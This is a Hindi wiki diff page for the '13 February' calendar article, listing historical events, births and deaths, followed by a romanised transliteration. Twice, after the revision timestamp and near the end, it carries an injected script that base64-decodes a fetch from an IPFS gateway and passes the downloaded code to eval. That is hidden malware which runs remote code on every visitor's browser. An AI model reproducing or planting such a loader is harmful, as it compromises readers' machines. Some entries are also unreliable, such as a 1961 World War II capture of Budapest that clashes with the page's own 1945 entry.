Difference between revisions of "13 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(4 intermediate revisions by 4 users not shown)
Line 5: Line 5:
 
==13 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==13 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
* 1542 - इंग्लैंड की रानी कैथरीन हवाई को मौत के घाट उतार दिया गया।
 
* 1542 - इंग्लैंड की रानी कैथरीन हवाई को मौत के घाट उतार दिया गया।
 +
* 1575 - [[फ्रांस]] के राजा हेनरी तृतीय का रेम्स में राज्याभिषेक।
 
* 1601 - लंदन में ईस्ट इंडिया कम्पनी की पहली यात्रा का नेतृत्व जान लैंकास्टर ने किया।
 
* 1601 - लंदन में ईस्ट इंडिया कम्पनी की पहली यात्रा का नेतृत्व जान लैंकास्टर ने किया।
 
* 1633 -  
 
* 1633 -  
Line 11: Line 12:
 
* 1688 - स्पेन ने पुर्तग़ाल को एक अलग राष्ट्र स्वीकार किया।
 
* 1688 - स्पेन ने पुर्तग़ाल को एक अलग राष्ट्र स्वीकार किया।
 
* 1689 - विलियम और मैरी इंग्लैंड के संयुक्त शासक घोषित हुए।  
 
* 1689 - विलियम और मैरी इंग्लैंड के संयुक्त शासक घोषित हुए।  
 +
* 1693 - [[अमेरिका]] के वर्जीनिया में विलियम एंड मैरी कॉलेज खुला।
 
* 1713 - दिल्ली के सुल्तान जहाँदारशाह की हत्या गला घोंट कर की गई।
 
* 1713 - दिल्ली के सुल्तान जहाँदारशाह की हत्या गला घोंट कर की गई।
 
* 1739 - करनाल के युद्ध में नादिरशाह की फ़ौज ने मुग़ल शासक मुहम्मद शाह की सेना को हराया।
 
* 1739 - करनाल के युद्ध में नादिरशाह की फ़ौज ने मुग़ल शासक मुहम्मद शाह की सेना को हराया।
 
* 1788 - भारत में ज्यादतियों के लिए वारेन हेस्टिंग्स पर इंग्लैंड में मुकदमा चलाया गया।
 
* 1788 - भारत में ज्यादतियों के लिए वारेन हेस्टिंग्स पर इंग्लैंड में मुकदमा चलाया गया।
 +
* 1795 - अमेरिका में पहला स्टेट यूनिवर्सिटी उत्तरी कैरोलिना में खुला।
 
* 1820 - फ़्रांसीसी तख्त के दावेदार डक की बेरी की हत्या कर दी गई।
 
* 1820 - फ़्रांसीसी तख्त के दावेदार डक की बेरी की हत्या कर दी गई।
 
* 1856 - ईस्ट इंडिया कम्पनी का लखनऊ सहित अवध पर भी कब्ज़ा।
 
* 1856 - ईस्ट इंडिया कम्पनी का लखनऊ सहित अवध पर भी कब्ज़ा।
 
* [[1861]] - नेपल्स के फ़्रांसीसी द्वितीय ने ग्यूसेपी गैरिबाल्डी के आगे हथियार डाले।
 
* [[1861]] - नेपल्स के फ़्रांसीसी द्वितीय ने ग्यूसेपी गैरिबाल्डी के आगे हथियार डाले।
* [[1879]] - सरोजनी नायडू का जन्म।
 
 
* [[1880]] - थॉमस एडिसन ने एडिसन इफ़ैक्ट पुष्ट किया।
 
* [[1880]] - थॉमस एडिसन ने एडिसन इफ़ैक्ट पुष्ट किया।
 
* [[1920]] - अमेरिका में बेसबॉल की नीग्रो नेशनल लीग स्थापित हुई।
 
* [[1920]] - अमेरिका में बेसबॉल की नीग्रो नेशनल लीग स्थापित हुई।
 
* [[1931]] - नई दिल्ली भारत की राजधानी घोषित हुई।
 
* [[1931]] - नई दिल्ली भारत की राजधानी घोषित हुई।
 +
* [[1941]] - [[जर्मनी]] में नाजियों ने डच यहूदी परिषद पर हमला किया।
 +
* [[1945]] - सोवियत संघ ने जर्मनी के साथ 49 दिन तक चले युद्ध के बाद हंगरी की राजधानी बुडापेस्ट पर कब्जा किया जिसमें एक लाख 59 हजार लोग मारे गये।
 +
* [[1959]] - बच्चों की पसंदीदा बार्बी डॉल की बिक्री शुरू हुई।
 
* [[1961]] -  
 
* [[1961]] -  
 
**द्वितीय विश्वयुद्ध में मित्र राष्ट्रों ने बुडापोस्ट पर कब्ज़ा किया।
 
**द्वितीय विश्वयुद्ध में मित्र राष्ट्रों ने बुडापोस्ट पर कब्ज़ा किया।
 
**सुरक्षा परिषद ने कांगों में गृहयुद्ध रोकने के लिए बल प्रयोग की स्वीकृति दी।
 
**सुरक्षा परिषद ने कांगों में गृहयुद्ध रोकने के लिए बल प्रयोग की स्वीकृति दी।
 +
* [[1966]] - सोवियत संघ ने पूर्वी कजाखस्तान में परमाणु परीक्षण किया।
 +
* [[1974]] - असंतुष्ट नोबेल विजेता अलेक्जेंडर सोलजेनिट्सिन को सोवियत संघ से निकाला गया।
 
* [[1975]] - तुर्की ने साइप्रस के उत्तरी भाग में अलग प्रशासन की स्थापना की।
 
* [[1975]] - तुर्की ने साइप्रस के उत्तरी भाग में अलग प्रशासन की स्थापना की।
 +
* [[1984]] - पूर्व [[प्रधानमंत्री]] [[इंदिरा गांधी]] ने नौसेना के लिए मुंबई स्थित मझगांव डॉक का शुभारंभ किया।
 
* [[1988]] - बांग्लादेश में राष्ट्रपति हुसैन मुहम्मद इरशाद को हटाने के लिए विपक्षी आंदोलनकारियों की मुहिम में सैकड़ों लोग घायल हुए।
 
* [[1988]] - बांग्लादेश में राष्ट्रपति हुसैन मुहम्मद इरशाद को हटाने के लिए विपक्षी आंदोलनकारियों की मुहिम में सैकड़ों लोग घायल हुए।
 
* [[1989]] - सोवियत सैनिक अफ़ग़ानिस्तान से हटने शुरू हुए।
 
* [[1989]] - सोवियत सैनिक अफ़ग़ानिस्तान से हटने शुरू हुए।
 +
* [[1990]] - अमेरिका, [[ब्रिटेन]] तथा फ्रांस ने जर्मनी को फिर से एकीकृत करने की सहमति दी।
 
* [[1991]] - अमेरिकी लड़ाकू विमानों ने बगदाद में अनेक बंकर नष्ट किए, जिसमें सैकड़ों सैनिक मारे गए।
 
* [[1991]] - अमेरिकी लड़ाकू विमानों ने बगदाद में अनेक बंकर नष्ट किए, जिसमें सैकड़ों सैनिक मारे गए।
 
* [[2000]] - बहुचर्चित पीनट्स कॉमिक पट्टी के सर्जक चार्ल्स शुल्ज का निधन।  
 
* [[2000]] - बहुचर्चित पीनट्स कॉमिक पट्टी के सर्जक चार्ल्स शुल्ज का निधन।  
 
* [[2001]] - अंतरिक्ष में क्षुद्रग्रह 'इरोस' पर पहला मानव रहित यान उतरा।  
 
* [[2001]] - अंतरिक्ष में क्षुद्रग्रह 'इरोस' पर पहला मानव रहित यान उतरा।  
 +
** मध्य अमेरिकी देश अल सल्वाडोर में 6.6 तीव्रता वाले [[भूकंप]] से कम से कम 400 लोगों की मौत हुई।
 
* [[2002]] - पर्ल अपहरण काण्ड का मुख्य अभियुक्त उमर शेख़ लाहौर में गिरफ़्तार, ईरान में हुई विमान दुर्घटना में 117 मरे।  
 
* [[2002]] - पर्ल अपहरण काण्ड का मुख्य अभियुक्त उमर शेख़ लाहौर में गिरफ़्तार, ईरान में हुई विमान दुर्घटना में 117 मरे।  
 
* [[2003]] - [[यश चोपड़ा]] को [[दादा साहब फालके पुरस्कार]] मिला।
 
* [[2003]] - [[यश चोपड़ा]] को [[दादा साहब फालके पुरस्कार]] मिला।
Line 38: Line 48:
 
* [[2009]]- रेल मंत्री लालू प्रसाद यादव में 2009-10 के अंतरिम रेल बजट पेश किया। [[उत्तर प्रदेश]] [[विधान सभा]] ने वित्तीय वर्ष 2009-10 के लिए 12,094 करोड़ रुपये के घाटे का बजट पेश किया।
 
* [[2009]]- रेल मंत्री लालू प्रसाद यादव में 2009-10 के अंतरिम रेल बजट पेश किया। [[उत्तर प्रदेश]] [[विधान सभा]] ने वित्तीय वर्ष 2009-10 के लिए 12,094 करोड़ रुपये के घाटे का बजट पेश किया।
 
* [[2010]]- [[महाराष्ट्र]] के [[पुणे]] में यहूदियों के प्रार्थना स्थल के नज़दीक बेकरी में शाम को हुए बम विस्फोट में पाँच महिलाओं और एक विदेशी नागरिक सहित नौ लोग मारे गए और 53 अन्य घायल हो गए।  
 
* [[2010]]- [[महाराष्ट्र]] के [[पुणे]] में यहूदियों के प्रार्थना स्थल के नज़दीक बेकरी में शाम को हुए बम विस्फोट में पाँच महिलाओं और एक विदेशी नागरिक सहित नौ लोग मारे गए और 53 अन्य घायल हो गए।  
 +
* [[2014]] - [[चीन]] के कैली शहर में एक अवैध जुआ घर में विस्फोट में 14 लोगों की मौत हो गयी तथा 17 लोग घायल हो गये।
  
 
==13 फ़रवरी को जन्मे व्यक्ति==
 
==13 फ़रवरी को जन्मे व्यक्ति==
Line 48: Line 59:
 
* [[1958]] - [[रश्मि प्रभा]] - समकालीन कवयित्री
 
* [[1958]] - [[रश्मि प्रभा]] - समकालीन कवयित्री
 
* [[1959]] - [[कमलेश भट्ट कमल]] - समकालीन कवि
 
* [[1959]] - [[कमलेश भट्ट कमल]] - समकालीन कवि
 +
* [[1945]] - [[विनोद मेहरा]] -  [[भारतीय सिनेमा]] के [[अभिनेता]]।
 +
 
==13 फ़रवरी को हुए निधन==
 
==13 फ़रवरी को हुए निधन==
 +
* [[2015]] - [[डॉ. तुलसीराम]] - दलित लेखन में अपना एक अलग स्थान रखने वाले साहित्यकार थे।
 +
* [[2008]] - [[राजेंद्र नाथ]] - [[हिंदी सिनेमा]] के हास्य कलाकार थे।
 
* [[1974]] - [[उस्ताद अमीर ख़ाँ]] - [[शास्त्रीय संगीत|भारतीय शास्त्रीय संगीत]] के प्रसिद्ध गायक (जन्म- 1912)
 
* [[1974]] - [[उस्ताद अमीर ख़ाँ]] - [[शास्त्रीय संगीत|भारतीय शास्त्रीय संगीत]] के प्रसिद्ध गायक (जन्म- 1912)
 +
* [[1918]] - [[सर सुंदर लाल]] - प्रसिद्ध विधिवेत्ता और सार्वजनिक कार्यकर्ता थे।
 
* 1832 - [[बुधु भगत]] - प्रसिद्ध क्रांतिकारी तथा 'लरका विद्रोह' के आरम्भकर्ता।
 
* 1832 - [[बुधु भगत]] - प्रसिद्ध क्रांतिकारी तथा 'लरका विद्रोह' के आरम्भकर्ता।
 +
 
==13 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==13 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
* [[विश्व रेडियो दिवस]]
 
* [[विश्व रेडियो दिवस]]
* उत्पादकता सप्ताह।
+
* उत्पादकता सप्ताह
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-today-13-02-2017/today-in-history/news/779049.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Revision as of 12:37, 29 August 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 13 faravari varsh ka 44 vaan din hai. sal mean abhi aur 321 din shesh haian. (lip varsh mean 322 din)

13 faravari ki mahattvapoorn ghatanaean

  • 1542 - ianglaiand ki rani kaitharin havaee ko maut ke ghat utar diya gaya.
  • 1575 - phraans ke raja henari tritiy ka rems mean rajyabhishek.
  • 1601 - landan mean eest iandiya kampani ki pahali yatra ka netritv jan laiankastar ne kiya.
  • 1633 -
    • itali ke khagolashastri gaililiyo ko rom pahuanchane par giraftar kar liya gaya.
    • vaijnanik gaililiyo gailili apane mukadame ke lie rom ae.
  • 1688 - spen ne purtagal ko ek alag rashtr svikar kiya.
  • 1689 - viliyam aur mairi ianglaiand ke sanyukt shasak ghoshit hue.
  • 1693 - amerika ke varjiniya mean viliyam eand mairi k aaulej khula.
  • 1713 - dilli ke sultan jahaandarashah ki hatya gala ghoant kar ki gee.
  • 1739 - karanal ke yuddh mean nadirashah ki fauj ne mugal shasak muhammad shah ki sena ko haraya.
  • 1788 - bharat mean jyadatiyoan ke lie varen hestiangs par ianglaiand mean mukadama chalaya gaya.
  • 1795 - amerika mean pahala stet yoonivarsiti uttari kairolina mean khula.
  • 1820 - fraansisi takht ke davedar dak ki beri ki hatya kar di gee.
  • 1856 - eest iandiya kampani ka lakhanoo sahit avadh par bhi kabza.
  • 1861 - nepals ke fraansisi dvitiy ne gyoosepi gairibaldi ke age hathiyar dale.
  • 1880 - th aaumas edisan ne edisan ifaikt pusht kiya.
  • 1920 - amerika mean besab aaul ki nigro neshanal lig sthapit huee.
  • 1931 - nee dilli bharat ki rajadhani ghoshit huee.
  • 1941 - jarmani mean najiyoan ne dach yahoodi parishad par hamala kiya.
  • 1945 - soviyat sangh ne jarmani ke sath 49 din tak chale yuddh ke bad hangari ki rajadhani budapest par kabja kiya jisamean ek lakh 59 hajar log mare gaye.
  • 1959 - bachchoan ki pasandida barbi d aaul ki bikri shuroo huee.
  • 1961 -
    • dvitiy vishvayuddh mean mitr rashtroan ne budapost par kabza kiya.
    • suraksha parishad ne kaangoan mean grihayuddh rokane ke lie bal prayog ki svikriti di.
  • 1966 - soviyat sangh ne poorvi kajakhastan mean paramanu parikshan kiya.
  • 1974 - asantusht nobel vijeta alekjeandar solajenitsin ko soviyat sangh se nikala gaya.
  • 1975 - turki ne saipras ke uttari bhag mean alag prashasan ki sthapana ki.
  • 1984 - poorv pradhanamantri iandira gaandhi ne nausena ke lie muanbee sthit majhagaanv d aauk ka shubharanbh kiya.
  • 1988 - baangladesh mean rashtrapati husain muhammad irashad ko hatane ke lie vipakshi aandolanakariyoan ki muhim mean saik doan log ghayal hue.
  • 1989 - soviyat sainik afaganistan se hatane shuroo hue.
  • 1990 - amerika, briten tatha phraans ne jarmani ko phir se ekikrit karane ki sahamati di.
  • 1991 - ameriki l dakoo vimanoan ne bagadad mean anek bankar nasht kie, jisamean saik doan sainik mare ge.
  • 2000 - bahucharchit pinats k aaumik patti ke sarjak charls shulj ka nidhan.
  • 2001 - aantariksh mean kshudragrah 'iros' par pahala manav rahit yan utara.
    • madhy ameriki desh al salvador mean 6.6 tivrata vale bhookanp se kam se kam 400 logoan ki maut huee.
  • 2002 - parl apaharan kand ka mukhy abhiyukt umar shekh lahaur mean giraftar, eeran mean huee viman durghatana mean 117 mare.
  • 2003 - yash chop da ko dada sahab phalake puraskar mila.
  • 2004 - bharatiy tim ne kvalalampur mean dasavian eshiyaee nishanebaji chaimpiyanaship mean svarn padak jita.
  • 2005 - irak mean saddam husain ke bad hue pahale chunav mean shiya islamik morche ki jit.
  • 2007 - uttar koriya paramanu karyakram band karane par sahamat.
  • 2008 - pakistan n kam doori ki marak kshamata vali misail gazanavi ka saphal parikshan kiya.
  • 2009- rel mantri laloo prasad yadav mean 2009-10 ke aantarim rel bajat pesh kiya. uttar pradesh vidhan sabha ne vittiy varsh 2009-10 ke lie 12,094 karo d rupaye ke ghate ka bajat pesh kiya.
  • 2010- maharashtr ke pune mean yahoodiyoan ke prarthana sthal ke nazadik bekari mean sham ko hue bam visphot mean paanch mahilaoan aur ek videshi nagarik sahit nau log mare ge aur 53 any ghayal ho ge.
  • 2014 - chin ke kaili shahar mean ek avaidh jua ghar mean visphot mean 14 logoan ki maut ho gayi tatha 17 log ghayal ho gaye.

13 faravari ko janme vyakti

13 faravari ko hue nidhan

13 faravari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh